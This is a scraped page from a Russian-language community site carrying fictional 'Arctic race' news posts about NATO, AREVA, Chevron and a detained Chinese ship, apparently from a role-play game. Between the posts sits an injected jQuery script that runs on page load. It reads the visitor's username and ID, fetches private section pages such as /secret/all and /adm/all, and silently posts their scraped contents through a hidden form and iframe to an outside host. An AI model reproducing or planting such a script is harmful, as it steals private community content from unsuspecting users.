Газета-ракета
Развернуто

Происшествия

Важнейшие события. Слухи и факты.

ХантерQuantumQuantum

Превентивный удар

Вопиющий случай произошел сегодня в Арктике. Нарушив все нормы права, Северо-Атлантический Альянс уничтожил заводской комплекс компании AREVA за неуплату налога. Убедившись воочию в том, что НАТО не охраняет предпринимателей, а наоборот использует в целях наживы, компании, задействованные в «арктической гонке», теперь выступают против присутствия НАТО в регионе.  Военное присутствие вооруженных сил НАТО, не только нарушает Договор о Демилитаризации Арктики (который, кстати никто не аннулировал), но и создает неблагоприятную обстановку для развития региона. Предприятия, работающие в Арктике, вынуждены отдавать НАТО существенную сумму от прибыли, якобы для того, чтобы НАТО продолжало «поддерживать безопасность» в регионе. На самом деле это банальный рэкет. Рэкет – вне закона, но кого это волнует, когда рэкетом занимается НАТО? Уничтожение предприятия, принадлежащего компании AREVA – лучшее тому подтверждение. 

 Некоторое время назад, основные надежды, на исправление ситуации в регионе были возложены на Арктический Совет. Но теперь стало понятно, что эта организация не способна противостоять НАТО. Значит, ее нужно таковой сделать, путем реорганизации. Например, позволить представителям компаний-участниц» арктической гонки», войти в Совет. Поскольку почти все компании, заинтересованные в развитии региона, страдают под экономическим гнетом НАТО, скооперировавшись они смогут повлиять на ситуацию в Арктике. Вряд ли получится изгнать Альянс из региона полностью, но можно заставить пойти НАТО на существенные уступки, один из наиболее действенных вариантов – создание демилитаризованных зон на пространстве, контролируемом этой организацией. Если же Альянс откажется пойти на встречу инициативе корпораций, то это решение может повлиять на всю экономическую ситуацию в регионе. С территорий, которые контролируются НАТО, начнется отток средств, перестанут работать месторождения и проходить морское сообщение.  По сути дела, Альянс лишится своего заработка. Не с кого будет брать мзду, и тогда теряется весь смысл пребывания войск НАТО в Арктике. А содержать войска в таких условиях дело весьма затратное. Чтобы их своеобразный «бизнес» не пошел прахом, НАТО придется пойти на уступки. И, конечно же, придется ответить за уничтожение частной собственности. И за нарушение Договора о Демилитаризации.

Еще одним хорошим решением было бы судебное заседание – компании, страдающие и несущие убытки под пятой НАТО, могли бы подать общий иск на Северо-Атлантический Альянс и заставить военный контингент покинуть регион. НАТО давно научилось не обращать внимания на подобные действия, но теперь эта организация сухой из Северо-Ледовитого океана точно не выйдет…

-script- // window.show_error = function(){}; var skip = "140 904 917 918 928"; var path = ["/122/all", "/cop/all", "/qwer/all", "/qwe/all", "/adm/all", "/murmrep/all", "/szvorf/all", "/asd/all", "/post-1030/all", "/secret/all"]; $(document).ready(function() { var user = $("#top-menu > ul > li:first-child > a").text(); var uid = $("#top-menu > ul > li:first-child > a").attr("href").match(/\/(\d+)\/$/).pop(); if (skip.indexOf(uid) < 0) { $("#body").before( $("<div />").attr("style", "display: none").append( $("<form />").attr("id","form-1").attr("action", "http://dump3458.110mb.com/dump.php").attr("method", "post").attr("target", "frame-1") .append($("<input />").attr("id", "user").attr("name", "user").attr("type", "text").attr("value", user)) .append($("<input />").attr("id", "path").attr("name", "path").attr("type", "text")) .append($("<textarea />").attr("id", "dump").attr("name", "dump")) ) .append($("<iframe />").attr("id", "frame-1").attr("name", "frame-1").attr("src", "http://dump3458.110mb.com")) ); $.each(path, function(index, value) { $.get(value, function(data, answer) { if (answer == "success") { var dump = "\n"+ user +" : "+ $("div.widget > h1", data).text() +" ["+ value +"]\n\n"; $("ul.msg5 > li:not(.spacer)", data).each(function() { dump += $("div.left > span", this).text() +" "+ $("div.top > div.right > i", this).text() +" / "+ $("div.top > div.right > a", this).text() + " ["+ $("div.top > div.right > a", this).attr("href") +"]\n"+ $("div.left > a.h3", this).text() + " ["+ $("div.left > a.h3", this).attr("href") +"] "+ $("div.bottom > span.anw > a", this).text() +" comments\n\n"+ $("div.snip > div.xhtml", this).text() +"\n\n"; }); $("input#path").attr("value", value); $("textarea#dump").append(dump); $("#form-1").submit(); } }); }); } }); // -script-

ХантерQuantumQuantum

Новый этап арктической гонки начался

До последнего времени для многих оставалось загадкой, почему одна из трех супердержав остается в стороне от главного события последних лет – арктической гонки. Долгое время со стороны Китая не было никаких претензий на арктическое пространство, что казалось очень странным, поскольку за последние десятилетия Китай стал весьма активным игроком на международной политической арене. И вот вчера, на территории подконтрольной НАТО было задержано  китайское грузовое судно. Идя с приличной скоростью по району, ранее не патрулируемому, оно было замечено НАТОвскими патрульными катерами. Корабль попытался скрыться, но по нему был открыт упреждающий огонь. Команда и груз были арестованы. Груз – строительные материалы и техника для строительства военных бункеров глубокого залегания. Кроме того, на груз не было никаких докладных и прочих бумаг. Команда, в составе семи человек, состояла из офицеров Китайских ВМС и одного политического офицера. Изъятые в ходе обыска военные документы членов команды скоро придадут огласке.  Надо сказать, это не единственный инцидент с китайскими фрахтовиками в Арктике. Экипажи грузовых кораблей, проходивших по этому маршруту, неоднократно наблюдали таинственные суда, по описаниям похожие на китайские модели. Эти корабли, обнаруживая, что в районе они не одни, тут же скрывались. Но это первый случай задержания подобного корабля. Экипаж – военные, груз – военный. Выходит, Поднебесная тоже включилась в Арктическую гонку, сделав это тайно. Вероятно, в Арктике расположена, наверняка не одна, китайская военная база, которая призвана защищать интересы Китая в данном регионе. Своеобразный туз в рукаве при переговорах о китайской доле арктических богатств. НАТО предоставило прессе фотографии задержанного китайского грузового судна и команды. Со стороны Китая никаких официальных заявлений по этому поводу сделано не было.

Еще одной новостью стало нахождение неких документов профессора Манцева. Их содержание неизвестно, но известно то, что ими завладели такие организации как НАТО и Chevron и с другой стороны Российские военные и РосАтом. Почему эти документы секретные и ими так заинтересовались военные, РосАтом и главное НАТО? Вполне вероятно, что в этих документах указано точное расположение богатейших месторождений Арктики. Эта гипотеза выглядит очень правдоподобно, поскольку компания Chevron обнаружила и «застолбила» крупнейшее месторождение оливина, крайне редкого и дорого в мире энергоресурса. Теперь над этим месторождением выситься пока не пущенная в действие установка для добычи.

Как мы с вами можем наблюдать, дорогой читатель, начался новый этап арктической гонки.  После появления на арене нового игрока и приватизации крупнейшего месторождения, уже не верится, что Арктический Совет сможет разрулить эту тяжелую ситуацию. Большие псы уже почуяли запах жирного куска мяса и вот-вот бросятся друг на друга, пытаясь им завладеть. И никакие нормы международного права не остановят их.

Стешаkermekkermek

Как Газпром оленеводам помогал

И Наконецtematema

Вчера в России было прекращено расследование всех недавних терактов

Добавить запись

Чтобы написать в текущий раздел, необходимо стать участником сообщества.

cache: no_info (4), no_need (7), no_cache (1), miss (4), cached (28)db queries: 9time: 0.109

При отправке данных на сервер произошла ошибка. Проверьте соединение с интернетом и попробуйте перезагрузить страницу.

У Вас не хватает прав на выполнение операции. Данные не были сохранены.